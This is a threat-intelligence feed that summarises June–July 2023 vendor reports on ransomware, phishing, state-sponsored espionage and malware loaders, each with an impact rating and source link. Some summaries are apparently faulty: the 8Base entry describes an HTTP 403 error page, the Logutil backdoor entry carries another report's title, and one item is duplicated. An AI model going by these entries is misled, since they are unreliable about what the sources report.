Intel Name:: Hackers_Exploiting_Unpatched_WordPress_Plugin_Flaw

Date of Scan:: 2023-07-05

Impact:: HIGH

Summary:: Wordfence researchers have identified the unpatched privilege escalation vulnerability being actively exploited in Ultimate Member, a WordPress plugin installed on over 200,000 sites. Also, discovered that this vulnerability is being actively exploited and it hasn’t been adequately patched in the latest version available, which is 2.6.6.

Source: https://www.wordfence.com/blog/2023/06/psa-unpatched-critical-privilege-escalation-vulnerability-in-ultimate-member-plugin-being-actively-exploited/

Intel Source:: TrendMicro

Intel Name:: Ransomware_Entrapped_in_WinSCP_by_Blackcat_Operators

Date of Scan:: 2023-07-04

Impact:: LOW

Summary:: TrendMicro researchers have identified malicious actors using malvertising to distribute malware via cloned webpages of legitimate organizations. The distribution involved a webpage of the well-known application WinSCP, an open-source Windows application for file transfer.

Source: https://www.trendmicro.com/en_us/research/23/f/malvertising-used-as-entry-vector-for-blackcat-actors-also-lever.html

Intel Source:: Deep Instinct

Intel Name:: New_C2_Framework_Leveraging_by_MuddyWater

Date of Scan:: 2023-07-04

Impact:: LOW

Summary:: Deep Instinct researchers have observed the Iranian state-sponsored group dubbed MuddyWater has been attributed to a previously unseen command-and-control (C2) framework called PhonyC2 that's been put to use by the actor since 2021.

Source: https://www.deepinstinct.com/blog/phonyc2-revealing-a-new-malicious-command-control-framework-by-muddywater

Intel Source:: ASEC

Intel Name:: Malware_being_executed_using_DNS_TXT_records

Date of Scan:: 2023-07-04

Impact:: LOW

Summary:: The AhnLab Security Emergency response Center (ASEC) has discovered instances where malware is being executed using DNS TXT records. This method of malware execution is significant because it is not commonly utilized, making it challenging to detect and analyze.

Source: https://asec.ahnlab.com/en/54916/

Intel Source:: ISC. SANS

Intel Name:: Updated_GuLoader_loader

Date of Scan:: 2023-07-03

Impact:: LOW

Summary:: This blog post on the SANS Internet Storm Center website details an infection chain for the Remcos RAT malware. It explains how the infection began with a malicious email containing a zip archive, which resulted in the download of a password-protected zip file. Inside this zip file, there was a decoy audio file and a malicious Windows shortcut. The Windows shortcut triggered the execution of a VBS file with a PowerShell script, leading to further infection on the host. The post also provides indicators of compromise (IOCs) including email headers and file hashes.

Source: https://isc.sans.edu/diary/rss/29990

Intel Source:: Cofense

Intel Name:: HMRC_Self_Assessment_Phish_Outsmart_SEGs

Date of Scan:: 2023-07-03

Impact:: LOW

Summary:: During the busy self-assessment season in the UK, threat actors take advantage of the heightened online activity to deceive unsuspecting individuals into revealing their sensitive information on fraudulent HM Revenue & Customs (HMRC) self-assessment websites. Phishing Defense Center (PDC) has noted this wave of attacks across various sectors and regrettably, these phishing emails often evade popular secure email gateways (SEGs) that are meant to provide protection for users. The phishing emails begin by pressuring users to immediately update their self-assessment online profile. This is a common tactic employed by threat actors to generate a deceptive perception of urgency and legitimacy.

Source: https://cofense.com/blog/unmasking-hmrc-self-assessment-phish-how-attackers-outsmart-secure-email-gateways-segs/

Intel Source:: ASEC

Intel Name:: Malware_Disguised_as_HWP_Document_File_Kimsuky

Date of Scan:: 2023-07-03

Impact:: LOW

Summary:: AhnLab Security Emergency response Center (ASEC) has discovered that the Kimsuky threat group is distributing malware disguised as HWP document files. The malware is a compressed file containing a readme.txt file and an executable file with an HWP document file extension. Running the executable file decodes a PowerShell command and saves it as update.vbs in the %APPDATA% folder. The update.vbs file conducts malicious activities, including the leakage of user credentials.

Source: https://asec.ahnlab.com/en/54736/

Intel Source:: Morphisec

Intel Name:: GuLoader_Campaign_Targets_Law_Firms_in_the_US

Date of Scan:: 2023-07-03

Impact:: LOW

Summary:: the GuLoader campaign from infecting systems was discussed that the campaign's targeting of specific industries and highlights the use of legitimate hosting services for distributing malware. The main focus is on the delivery of the Remcos RAT through GuLoader and how Morphisec's AMTD technology can protect systems from these attacks.

Source: https://blog.morphisec.com/guloader-campaign-targets-law-firms-in-the-us

Intel Source:: volexity

Intel Name:: Charming_Kitten_updates_backdoor_called_POWERSTAR

Date of Scan:: 2023-07-02

Impact:: MEDIUM

Summary:: Volexity reserachers very often sees one threat actor that using techniques is Charming Kitten, who is assumed to be operating out of Iran. Charming Kitten is primarily concerned with collecting intelligence by compromising account credentials and, the email of individuals they successfully spear phishing. The new version of POWERSTAR backddor was analyzed by the Volexity team and led the to the discovery that Charming Kitten has been spreading their malware alongside their spear-phishing techniques.

Source: https://www.volexity.com/blog/2023/06/28/charming-kitten-updates-powerstar-with-an-interplanetary-twist/

Intel Source:: PaloAlto

Intel Name:: Detecting_Popular_Cobalt_Strike_Malleable_C2_Profile_Techniques

Date of Scan:: 2023-07-02

Impact:: LOW

Summary:: Overall, Unit 42 researchers have discovered two Cobalt Strike Team Server instances hosted online. They have also found new malleable C2 profiles that are not publicly available, which attackers use to avoid detection and exploit Cobalt Strike. They have also found new malleable C2 profiles that are not publicly available, which attackers use to avoid detection and exploit Cobalt Strike. The operators of these Team Server instances hide their C2 infrastructure using popular services and public cloud infrastructure providers. Additionally, the researchers have provided guidance for Palo Alto Networks customers on how to receive protection and mitigation against Cobalt Strike Beacon and other related Cobalt Strike tools.

Source: https://unit42.paloaltonetworks.com/cobalt-strike-malleable-c2/

Intel Source:: ASEC

Intel Name:: ASEC_Weekly_Phishing_Email_Threats_analyses_June11_17_2023

Date of Scan:: 2023-07-02

Impact:: LOW

Summary:: The ASEC analysis team keeps monitoring phishing email threats with their system and honeypot. This article explains the distribution of phishing emails during the week from June 11th to June 17th, 2023 and provide statistical information on each type.

Source: https://asec.ahnlab.com/en/54861/

Intel Source:: vmware

Intel Name:: 8Base_Ransomware

Date of Scan:: 2023-07-02

Impact:: LOW

Summary:: The 8Base ransomware group has remained relatively unknown despite the massive spike in activity in Summer of 2023. The subpage provides information about an HTTP 403 error, but does not offer any further details.

Source: https://blogs.vmware.com/security/2023/06/8base-ransomware-a-heavy-hitting-player.html

Intel Source:: PaloAlto

Intel Name:: Manic_Menagerie_2_0_threat_actor

Date of Scan:: 2023-07-01

Impact:: MEDIUM

Summary:: Unit 42 researchers discovered an active campaign that aims several web hosting and IT providers in the United States and European Union from late 2020 to late 2022. Unit 42 assumes the activity associated with this campaign as CL-CRI-0021 and believes it stems from the same threat actor responsible for the previous campaign known as Manic Menagerie.

Source: https://unit42.paloaltonetworks.com/manic-menagerie-targets-web-hosting-and-it/

Intel Source:: Sentilone

Intel Name:: The_exposion_of_active_adversary_JokerSpy

Date of Scan:: 2023-07-01

Impact:: LOW

Summary:: The researchers at BitDefender and Elastic have discovered an active adversary starting a novel spyware, cross-platform backdoors and an open-source reconnaissance tool to compromise organizations with macOS devices in their cortege. So far there are not a lot of known victims at this time, the analysis suggest that the threat actors have likely targeted other organizations. Sentilone reserachers shared their key components and indicators used in the campaign to help raise awareness and aid security teams and threat hunters.

Source: https://www.sentinelone.com/blog/jokerspy-unknown-adversary-targeting-organizations-with-multi-stage-macos-malware/

Intel Source:: Fortinet

Intel Name:: New_Fast_Developing_ThirdEye_Infostealer

Date of Scan:: 2023-06-30

Impact:: LOW

Summary:: FortiGuard Labs recently discovered some files that look suspicious. Their investigation discovered that the files are malicious and revealed there is more to them than meets the eye: they are a previously unseen infostealer that was named “ThirdEye”. While this malware is not considered sophisticated, it’s targeting to steal various information from compromised machines that can be used as step for future attacks.

Source: https://www.fortinet.com/blog/threat-research/new-fast-developing-thirdeye-infostealer-pries-open-system-information

Intel Source:: Cofense

Intel Name:: Malicious_Actors_deploy_phishing_pages_to_mobile_devices

Date of Scan:: 2023-06-30

Impact:: LOW

Summary:: The Cofense Phishing Defense Center analysts has discovered a spike in the number of malicious emails utilizing this attack vector. In order to bypass traditional file and text detection software, QR codes provide threat actors with a different tactic to encode malicious URLs.

Source: https://cofense2022stg.wpengine.com/blog/malicious-actors-utilizing-qr-codes-to-deploy-phishing-pages-to-mobile-devices/

Intel Source:: ASEC

Intel Name:: ASEC_Weekly_Malware_Analysis_June_5_June_11th_2023

Date of Scan:: 2023-06-29

Impact:: LOW

Summary:: The ASEC analysis team keeps monitoring a weekly malware collection samples for June 5-11th, 2023. They used their automatic analysis system RAPIT to categorize and respond to known malware.The top malwares for this week are Amadey, Lokibot, Guloader, AgentTesla and Formbook.

Source: https://asec.ahnlab.com/en/54260/

Intel Source:: Avanan

Intel Name:: PDF_Based_Attacks_Are_Becoming_More_Common

Date of Scan:: 2023-06-28

Impact:: LOW

Summary:: Researchers from Avanan have deep-dived into PDF-based attacks and identified that the malicious PDF file masquerades as a legitimate 'DocuSign' document, luring unsuspecting users to a fraudulent webpage where they are asked to enter their login credentials, including the recipient's email address.

Source: https://www.avanan.com/blog/pdf-based-attacks-on-the-rise-heres-how-deep-learning-can-prevent-them

Intel Source:: Cyble

Intel Name:: Linux_Users_at_Risk_From_Akira_Ransomware

Date of Scan:: 2023-06-28

Impact:: LOW

Summary:: Cyble researchers have recently shared crucial details about the activities of a newly identified ransomware group known as “Akira.” This group is actively targeting numerous organizations, compromising their sensitive data. It is worth noting that Akira ransomware has expanded its operations to include the Linux platform.

Source: https://blog.cyble.com/2023/06/28/akira-ransomware-extends-reach-to-linux-platform/

Intel Source:: Cyble

Intel Name:: The_details_of_Wagner_Groups_Cyber_campaign

Date of Scan:: 2023-06-27

Impact:: LOW

Summary:: Cyble researchers investigated a new ransomware called Wagner. This ransomware is possible a variant of Chaos ransomware. The reserachers analyzed that the ransom note insists users to join the PMC Wagner. It was discovered that the ransomware sample was initially submitted on VirusTotal from Russia. Because the ransom note is written in Russian, it assumes that the ransomware may primarily target victims within Russia. The Wagner ransomware is a 32-bit binary targeting the Windows operating system.

Source: https://blog.cyble.com/2023/06/27/unveiling-wagner-groups-cyber-recruitment/

Intel Source:: IBM Security Intelligence

Intel Name:: The_Examination_of_Trickbot_and_Conti_Crypters

Date of Scan:: 2023-06-27

Impact:: LOW

Summary:: IBM Security X-Force researchers have deep-dived into the crypters used by the Trickbot/Conti syndicate.

Source: https://securityintelligence.com/posts/trickbot-conti-crypters-where-are-they-now/

Intel Source:: Krebson Security

Intel Name:: SMS_Phishers_hacked_sensitive_data_from_UPS_Tracking_Tool

Date of Scan:: 2023-06-27

Impact:: LOW

Summary:: The United Parcel Service (UPS) says fraudsters have been harvesting phone numbers and other information from its online shipment tracking tool in Canada to send highly targeted SMS phishing (a.k.a. “smishing”) messages that spoofed UPS and other top brands.

Source: https://krebsonsecurity.com/2023/06/sms-phishers-harvested-phone-numbers-shipment-data-from-ups-tracking-tool/?replytocom=586273

Intel Source:: Cybergeeks

Intel Name:: The_details_of_the_Saltwater_Backdoor_used_in_Barracuda_vulnerability

Date of Scan:: 2023-06-27

Impact:: MEDIUM

Summary:: SALTWATER is a backdoor that exploiting the Barracuda 0-day vulnerability CVE-2023-2868. It is a module for the Barracuda SMTP daemon called bsmtpd. The malware hooked the recv, send, and close functions using an open-source hooking library called funchook. The following functionalities are implemented: execute arbitrary commands, download and upload files, proxy functionality, and tunneling functionality.

Source: https://cybergeeks.tech/a-technical-analysis-of-the-saltwater-backdoor-used-in-barracuda-0-day-vulnerability-cve-2023-2868-exploitation/

Intel Source:: Fortinet

Intel Name:: The_Black_Basta_ransomware_cover_of_roundup

Date of Scan:: 2023-06-27

Impact:: MEDIUM

Summary:: FortiGuard Labs analysts analyzed data on ransomware variants that have been gaining intrest within their datasets and the OSINT community. Their Ransomware Roundup report shares with readers the brief insights into the evolving ransomware landscape and the Fortinet solutions that protect against those variants.

Source: https://www.fortinet.com/blog/threat-research/ransomware-roundup-black-basta

Intel Source:: ISC.SANS

Intel Name:: Email_Spam_using_Modiloader_Attachments

Date of Scan:: 2023-06-26

Impact:: LOW

Summary:: Researchers from SANS have analyzed 2 emails attachment in quarantine that had different text with the same attachment.

Source: https://isc.sans.edu/diary/Email+Spam+with+Attachment+Modiloader/29978/

Intel Source:: ISC.SANS

Intel Name:: Word_Document_with_Online_Template_Attached

Date of Scan:: 2023-06-26

Impact:: LOW

Summary:: Researchers from SANS has been found behaving like a dropper. It uses a remote Word template and makes an HTTP request to an external website.

Source: https://isc.sans.edu/diary/Word+Document+with+an+Online+Attached+Template/29976/

Intel Source:: Deep Instinct

Intel Name:: Powerful_JavaScript_Dropper_PindOS_Spreading_Bumblebee_and_IcedID_Malware

Date of Scan:: 2023-06-24

Impact:: MEDIUM

Summary:: Deep Instinct researchers have observed a new strain of JavaScript dropper which is delivering next-stage payloads like Bumblebee and IcedID.

Source: https://www.deepinstinct.com/blog/pindos-new-javascript-dropper-delivering-bumblebee-and-icedid

Intel Source:: ISC.SANS

Intel Name:: Qakbot_Distributing_Tag_via_Obama_Series

Date of Scan:: 2023-06-24

Impact:: LOW

Summary:: Qakbot using the Obama-series distribution tag has been active this week on Tuesday 2023-06-20 (obama269), Wednesday 2023-06-21 (obama270), and Thursday 2023-06-22 (obama271).

Source: https://isc.sans.edu/diary/Qakbot+Qbot+activity+obama271+distribution+tag/29968/

Intel Source:: Zscaler

Intel Name:: RedEnergy_Stealer_as_a_Ransomware_Attacks

Date of Scan:: 2023-06-23

Impact:: LOW

Summary:: Zscaler researchers have discovered a new malware variant, RedEnergy stealer that fits into the hybrid Stealer-as-a-Ransomware threat category. RedEnergy stealer uses a fake update campaign to target multiple industry verticals and possesses the ability to steal information from various browsers, enabling the exfiltration of sensitive data, while also incorporating different modules for carrying out ransomware activities.

Source: https://www.zscaler.com/blogs/security-research/ransomware-redefined-redenergy-stealer-ransomware-attacks

Intel Source:: Krebson Security

Intel Name:: The_Service_in_question_rents_email_addresses

Date of Scan:: 2023-06-23

Impact:: LOW

Summary:: The service in question from KrebosSecurity blog was kopeechka[.]store — is a kind of unidirectional email confirmation-as-a-service that lures you to “save your time and money for successfully registering multiple accounts.” That new service offers to help to save and cut costs associated with large-scale spam and account creation campaigns, by paying people to sell their email account credentials and letting customers temporarily rent access to a vast pool of established accounts at major providers.

Source: https://krebsonsecurity.com/2023/06/service-rents-email-addresses-for-account-signups/?replytocom=585549

Intel Source:: Checkpoint

Intel Name:: Hackers_Using_USB_Driven_Self_Propagating_Malware_to_Attack_the_Camaro_Dragon

Date of Scan:: 2023-06-23

Impact:: MEDIUM

Summary:: Checkpoint researchers have identified that the Chinese cyber espionage actor known as Camaro Dragonleveraging a new strain of self-propagating malware that spreads through compromised USB drives.

Source: https://research.checkpoint.com/2023/beyond-the-horizon-traveling-the-world-on-camaro-dragons-usb-flash-drives/

Intel Source:: Cyble

Intel Name:: New_Infection_Strategy_of_Mallox_Ransomware

Date of Scan:: 2023-06-23

Impact:: LOW

Summary:: Two years ago, the new ransomware appeared known as “TargetCompany”. and got a lot of attention due to its unique method of appending the name of the targeted company as a file extension This ransomware variant was also noticed using a “.mallox” extension to encrypted files, linking it to its previous identification as “Mallox”. Last year, Cyble Research analysts also observed a significant spike in the Mallox ransomware samples. Cyble analysts discovered a new variation of the Mallox ransomware that now appends the file extension “.malox” to the encrypted files, whereas previously, it used the “.mallox” extension. This ransomware binary is deployed using BatLoader, which is similar to the one reported – spreading RATs and Stealers.

Source: https://blog.cyble.com/2023/06/22/mallox-ransomware-implements-new-infection-strategy/

Intel Source:: Cyble

Intel Name:: New_Infection_Strategy_Implemented_by_Mallox_Ransomware

Date of Scan:: 2023-06-23

Impact:: LOW

Summary:: Cyble researchers have observed a new variation of the Mallox ransomware that now appends the file extension .malox to the encrypted files, whereas previously, it used the .mallox extension. This ransomware binary is deployed using BatLoader, which is similar to the one reported – spreading RATs and Stealers.

Source: https://blog.cyble.com/2023/06/22/mallox-ransomware-implements-new-infection-strategy/

Intel Source:: Microsoft

Intel Name:: Cryptocurrency_Mining_Campaigns_Targeting_Linux_and_IoT_Devices

Date of Scan:: 2023-06-23

Impact:: LOW

Summary:: Microsoft researchers have identified that Internet-facing Linux systems and Internet of Things (IoT) devices are being targeted as part of a new campaign designed to illicitly mine cryptocurrency.

Source: https://www.microsoft.com/en-us/security/blog/2023/06/22/iot-devices-and-linux-based-systems-targeted-by-openssh-trojan-campaign/

Intel Source:: TrendMicro

Intel Name:: An_Overview_of_Trigona_Ransomware_Various_Versions

Date of Scan:: 2023-06-23

Impact:: LOW

Summary:: The Trigona ransomware is a relatively new ransomware family that began activities around late October 2022 — although samples of it existed as early as June 2022. Since then, Trigona’s operators have remained highly active, and in fact, have been continuously updating their ransomware binaries.

Source: https://www.trendmicro.com/en_us/research/23/f/an-overview-of-the-trigona-ransomware.html

Intel Source:: PaloAlto

Intel Name:: Multiple_IoT_Exploits_Used_in_Latest_Mirai_Campaign

Date of Scan:: 2023-06-23

Impact:: LOW

Summary:: Paloalto researchers have observed threat actors leveraging several IoT vulnerabilities to spread a variant of the Mirai botnet.

Source: https://unit42.paloaltonetworks.com/mirai-variant-targets-iot-exploits/

Intel Source:: ASEC

Intel Name:: Kimsuky_Distributing_CHM_Malware

Date of Scan:: 2023-06-22

Impact:: LOW

Summary:: ASEC researchers have continuously tracked the Kimsuky group’s APT attacks. While the Kimsuky group often used document files for malware distribution, there have been many recent cases where CHM files were used in distribution. Also, unlike in the past when the document files contained North Korea-related topics, the group is now attempting to attack using a variety of subjects.

Source: https://asec.ahnlab.com/en/54678/

Intel Source:: Symantec

Intel Name:: Chinese_Hacking_Group_Flea_Targeting_American_Ministries

Date of Scan:: 2023-06-22

Impact:: MEDIUM

Summary:: Symantec researchers have identified that a Chinese state-sponsored actor named Flea targeting Foreign affairs ministries in the Americas as part of a recent campaign that spanned from late 2022 to early 2023.

Source: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/flea-backdoor-microsoft-graph-apt15

Intel Source:: Fortinet

Intel Name:: Condi_DDoS_Botnet_Spreading_Through_TP_Link_Vulnerability

Date of Scan:: 2023-06-22

Impact:: LOW

Summary:: Fortinet researchers have observed that a new DDoS-as-a-Service botnet called "Condi" emerged in May 2023, exploiting a vulnerability in TP-Link Archer AX21 (AX1800) Wi-Fi routers to build an army of bots to conduct attacks.

Source: https://www.fortinet.com/blog/threat-research/condi-ddos-botnet-spreads-via-tp-links-cve-2023-1389

Intel Source:: ASEC

Intel Name:: The_Examination_of_Ransomware_With_BAT_File_Extension_Attacking_MS_SQL_Servers

Date of Scan:: 2023-06-22

Impact:: LOW

Summary:: ASEC researchers have discovered the Mallox ransomware with the BAT file extension distributing to poorly managed MS-SQL servers. Extensions of files distributed to poorly managed MS-SQL servers include not only EXE but also BAT, which is a fileless format. The files distributed with the BAT file extension that has been discovered so far are Remcos RAT and Mallox.

Source: https://asec.ahnlab.com/en/54704/

Intel Source:: Securonix Threat Labs

Intel Name:: New_MULTI_STORM_Attack_Campaign_by_Python_Loader

Date of Scan:: 2023-06-22

Impact:: MEDIUM

Summary:: An interesting phishing campaign was recently analyzed by the Securonix Threat Research Team. The attack kicks off when the user clicks on a heavily obfuscated JavaScript file contained in a password protected zip file. The attack chain ends with the victim machine infected with multiple unique RAT (remote access trojan) malware instances, such as Warzone RAT and Quasar RAT. Both are used for command and control during different stages of the infection chain.

Source: https://www.securonix.com/securonix-threat-labs-security-advisory-multistorm-leverages-python-based-loader-as-onedrive-utilities-to-drop-rat-payloads/

Intel Source:: ASEC

Intel Name:: RedEyes_Group_Wiretapping_Individuals

Date of Scan:: 2023-06-22

Impact:: LOW

Summary:: ASEC researchers have discovered the redEyes (APT37) is a state-sponsored APT group targeting individuals. They recently used an Infostealer with wiretapping capabilities and a GoLang backdoor. Spear phishing emails were used for initial access, and Ably platform for command and control. Privilege escalation techniques were employed, and an Infostealer named FadeStealer stole data and wiretapped microphones.

Source: https://asec.ahnlab.com/en/54349/

Intel Source:: CERT-UA

Intel Name:: APT28_Group_Leveraging_Three_Roundcube_Exploits

Date of Scan:: 2023-06-22

Impact:: LOW

Summary:: CERT-UA researchers have discovered APT28 utilized three exploits targeting Roundcube (CVE-2020-35730, CVE-2021-44026, CVE-2020-12641) during a recent espionage campaign against a Ukrainian government organization. The attack involved malicious emails containing exploit code and JavaScript files for exfiltration

Source: https://cert.gov.ua/article/4905829

Intel Source:: PaloAlto

Intel Name:: Evaluation_of_Threat_Group_Muddled_Libra

Date of Scan:: 2023-06-22

Impact:: LOW

Summary:: PaloAlto researchers have identified that a new threat group dubbed "Muddled Libra" is targeting large outsourcing firms with multi-layered, persistent attacks that start with smishing and end with data theft. The group is also using the infrastructure that it compromises in downstream attacks on victims' customers.

Source: https://unit42.paloaltonetworks.com/muddled-libra/

Intel Source:: Fortinet

Intel Name:: New_Ransomware_Variant_Big_Head

Date of Scan:: 2023-06-21

Impact:: LOW

Summary:: FortiGuard Labs have recently come across a new ransomware variant called Big Head, which came out in May 2023. Although there are at least three variants of Big Head ransomware, all are designed to encrypt files on victims’ machines to extort money, like other ransomware variants.

Source: https://www.fortinet.com/blog/threat-research/fortiguard-labs-ransomware-roundup-big-head

Intel Source:: Team Cymru

Intel Name:: The_Aesi_Return_with_Darth_Vidar

Date of Scan:: 2023-06-21

Impact:: LOW

Summary:: Researchers from Team-Cymru have observed that Vidar threat actors continue to rotate their backend IP infrastructure, favoring providers in Moldova and Russia.

Source: https://www.team-cymru.com/post/darth-vidar-the-aesir-strike-back

Intel Source:: Esentire

Intel Name:: DcRAT_a_clone_of_AsyncRAT

Date of Scan:: 2023-06-21

Impact:: LOW

Summary:: In May 2023, eSentire identified DcRAT, a clone of AsyncRAT, at a consumer services customer. DcRAT is a remote access tool with info-stealing and ransomware capabilities. The malware is actively distributed using explicit lures for OnlyFans pages and other adult content.

Source: https://www.esentire.com/blog/onlydcratfans-malware-distributed-using-explicit-lures-of-onlyfans-pages-and-other-adult-content

Intel Source:: ASEC

Intel Name:: ASEC_Weekly_Phishing_Email_analysis_June_4_10_2023

Date of Scan:: 2023-06-21

Impact:: LOW

Summary:: The ASEC analysis team keep monitoring phishing email threats with their automatic sample analysis system (RAPIT) and honeypot. Their post explained the samples of distribution of phishing emails during the week from June 4, 2023 to June 10th, 2023. They covered the cases of distribution of phishing emails during the week from June 4th, 2023 to June 10th, 2022 and provide statistical information on each type.

Source: https://asec.ahnlab.com/en/54662/

Intel Source:: Checkpoint

Intel Name:: Attackers_Abusing_Legitimate_Services_For_Credential_Theft

Date of Scan:: 2023-06-21

Impact:: LOW

Summary:: Check Point researchers have detected an ongoing phishing campaign that uses legitimate services for credential harvesting and data exfiltration in order to evade detection.

Source: https://blog.checkpoint.com/security/sign-in-to-continue-and-suffer-attackers-abusing-legitimate-services-for-credential-theft/

Intel Source:: eSentire

Intel Name:: The_Analysis_of_Resident_Campaign

Date of Scan:: 2023-06-21

Impact:: LOW

Summary:: eSentire researchers have observed the resurgence of what we believe to be a malicious campaign targeting manufacturing, commercial, and healthcare organizations.

Source: https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-resident-campaign

Intel Source:: Bitdefender

Intel Name:: Hackers_Running_an_Active_Cryptojacking_Campaign

Date of Scan:: 2023-06-21

Impact:: LOW

Summary:: Bitdefender security researchers have discovered a threat group likely based in Romania that's been active since at least 2020. They've been targeting Linux-based machines with weak SSH credentials, mainly to deploy Monero mining malware, but their toolbox allows for other kinds of attacks.

Source: https://www.bitdefender.co.uk/blog/labs/how-we-tracked-a-threat-group-running-an-active-cryptojacking-campaign/

Intel Source:: Cyble

Intel Name:: New_Malware_Campaign_Targeting_LetsVPN_Users

Date of Scan:: 2023-06-21

Impact:: LOW

Summary:: Cyble researchers have discovered the existence of numerous counterfeit LetsVPN websites while conducting a routine threat-hunting exercise. These fraudulent sites share a common user interface and are deliberately designed to distribute malware, masquerading as the genuine LetsVPN application.

Source: https://blog.cyble.com/2023/06/16/new-malware-campaign-targets-letsvpn-users/

Intel Source:: Esentire

Intel Name:: Aurora_Stealer_malware_analysis

Date of Scan:: 2023-06-21

Impact:: LOW

Summary:: The subpage discusses the Aurora Stealer malware targeting the manufacturing industry through fake downloads distributed via Google Ads. The malware gathers sensitive data, has a pricing plan, and is written in the Go Programming language. It also provides indicators of compromise and recommendations for protection against the malware.

Source: https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-aurora-stealer

Intel Source:: ASEC

Intel Name:: Disguised_malware_as_a_security_update_installer

Date of Scan:: 2023-06-21

Impact:: LOW

Summary:: AhnLab recently discovered the attack of a hacking group that is supported by a certain government. The discovered malware disguised itself as a security update installer and was developed using the Inno Setup software.

Source: https://asec.ahnlab.com/en/54375/

Intel Source:: PaloAlto

Intel Name:: Hackers_Targeting_Middle_Eastern_and_African_Governments_with_Advanced_Techniques

Date of Scan:: 2023-06-20

Impact:: MEDIUM

Summary:: PaloAlto researchers have identified that Governmental entities in the Middle East and Africa have been at the receiving end of sustained cyber-espionage attacks that leverage never-before-seen and rare credential theft and Exchange email exfiltration techniques.

Source: https://www.paloaltonetworks.com/blog/security-operations/through-the-cortex-xdr-lens-uncovering-a-new-activity-group-targeting-governments-in-the-middle-east-and-africa/

Intel Source:: ASEC

Intel Name:: Tsunami_DDoS_Malware_Distributing_to_Linux_SSH_Servers

Date of Scan:: 2023-06-20

Impact:: MEDIUM

Summary:: ASEC researchers have discovered an attack campaign that consists of the Tsunami DDoS Bot being installed on inadequately managed Linux SSH servers. Not only did the threat actor install Tsunami, but they also installed various other malware such as ShellBot, XMRig CoinMiner, and Log Cleaner.

Source: https://asec.ahnlab.com/en/54647/

Intel Source:: ASEC

Intel Name:: RecordBreaker_Infostealer_Disguised_as_a_Dot_NET_Installer

Date of Scan:: 2023-06-20

Impact:: LOW

Summary:: ASEC researchers have observed that the encrypted malware file is downloaded from the threat actor’s server and executed. The malware in this instance is the RecordBreaker (Raccoon Stealer V2) Infostealer.

Source: https://asec.ahnlab.com/en/54658/

Intel Source:: Bitdefender

Intel Name:: The_Aesir_Return_with_Darth_Vidar

Date of Scan:: 2023-06-20

Impact:: LOW

Summary:: BitDefender researchers have identified the behaviors in a recent incident investigated by them, where a presumably custom malware tracked by researchers as Logutil backdoor was deployed. The operation was active for more than a year with the end goal of compromising credentials and data exfiltration.

Source: https://www.bitdefender.com/files/News/CaseStudies/study/431/Bitdefender-Labs-Report-X-creat6958-en-EN.pdf

Intel Source:: ISC.SANS

Intel Name:: Malware_Delivering_Through_Dot_inf_File

Date of Scan:: 2023-06-20

Impact:: LOW

Summary:: Researchers from SANS have analyzed the .inf files and observed that it is delivering malware.

Source: https://isc.sans.edu/diary/rss/29960

Intel Source:: ISC.SANS

Intel Name:: Formbook_From_Possible_ModiLoader

Date of Scan:: 2023-06-19

Impact:: LOW

Summary:: Researchers from SANS have analyzed the recent Formbook samples and came across an example that kicks off with an Excel file exploiting CVE-2017-11882 to use what seems like ModiLoader (also known as DBatLoader).

Source: https://isc.sans.edu/diary/rss/29958

Intel Source:: CERT-UA

Intel Name:: Cyberattacks_Against_Users_of_UKR_NET_Service

Date of Scan:: 2023-06-19

Impact:: MEDIUM

Summary:: CERT-UA researchers have identified an e-mail was received from a participant of the information exchange with the subject "Suspicious activity observed @UKR.NET" and an attachment in the form of a PDF file "Security warning.pdf" sent, apparently, on behalf of UKR.NET technical support. The mentioned PDF document contains a link to a fraudulent web resource that imitates the web page of the postal service.

Source: https://cert.gov.ua/article/4928679

Intel Source:: CERT-UA

Intel Name:: GhostWriter_Group_Targeting_State_Organization_of_Ukraine

Date of Scan:: 2023-06-19

Impact:: MEDIUM

Summary:: CERT-UA researchers have discovered the PPT document "daewdfq342r.ppt", which contains a macro and a thumbnail image with the emblem of the National Defense University of Ukraine named after Ivan Chernyakhivskyi.

Source: https://cert.gov.ua/article/4905718

Intel Source:: ISC.SANS

Intel Name:: RAT_Delivering_Through_VBS

Date of Scan:: 2023-06-19

Impact:: LOW

Summary:: Researchers from SANS have observed that RAT is delivering via VBS.

Source: https://isc.sans.edu/diary/rss/29956

Intel Source:: Cyfirma

Intel Name:: An_Evolving_Stealer_Called_Mystic

Date of Scan:: 2023-06-18

Impact:: LOW

Summary:: CYFIRMA researchers' team recently discovered an information stealer called Mystic Stealer being promoted in an underground forum, with the threat actor utilizing a Telegram channel for their operations.

Source: https://www.cyfirma.com/outofband/mystic-stealer-evolving-stealth-malware/

Intel Source:: Sygnia

Intel Name:: Analazying_a_global_adversary_in_the_middle_campaign

Date of Scan:: 2023-06-17

Impact:: LOW

Summary:: In the begining of this year, Sygnia’s IR team was investigating and analyzing about a Business Email Compromise (BEC) attack against one of its clients.The threat actor gained initial access to one of the victim employees' accounts and executed an ‘Adversary In The Middle’ attack to bypass Office365 authentication and gain persistent access to that account. After getting the access, the threat actor exfiltrated data from the compromised account and used his access to spread phishing attacks to other victim’s employees along with several external targeted organizations.

Source: https://blog.sygnia.co/cracking-global-phishing-campaign-using-threat-intelligence-toolkit

Intel Source:: CADO Security

Intel Name:: An_Emerging_Romanian_Threat_Actor_Named_Diicot

Date of Scan:: 2023-06-17

Impact:: LOW

Summary:: Cado security researchers have identified an interesting attack pattern that could be attributed to the threat actor Diicot (formerly, “Mexals”).

Source: https://www.cadosecurity.com/tracking-diicot-an-emerging-romanian-threat-actor/

Intel Source:: Symantec

Intel Name:: Long_Running_Shuckworm_Intrusions_Against_Ukrainian_Organizations

Date of Scan:: 2023-06-17

Impact:: LOW

Summary:: Symantec researchers have identified that the Russian threat actor known as Shuckworm has continued its cyber assault spree against Ukrainian entities in a bid to steal sensitive information from compromised environments.

Source: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/shuckworm-russia-ukraine-military

Intel Source:: Cofense

Intel Name:: MultiStage_Phishing_Attac_Targeted_Xneelo_Users

Date of Scan:: 2023-06-17

Impact:: LOW

Summary:: Cofense researchers have observed multi-stage phishing campaign targeting Xneelo customers was discovered, involving a fake KonsoleH login page to obtain login details, credit card information, and SMS 2FA codes.

Source: https://cofense.com/blog/xneelo-users-targeted-in-a-multi-stage-phishing-attack/

Intel Source:: Stairwell

Intel Name:: Chinese_Hackers_Using_DNS_Over_HTTPS_For_Linux_Malware_Communication

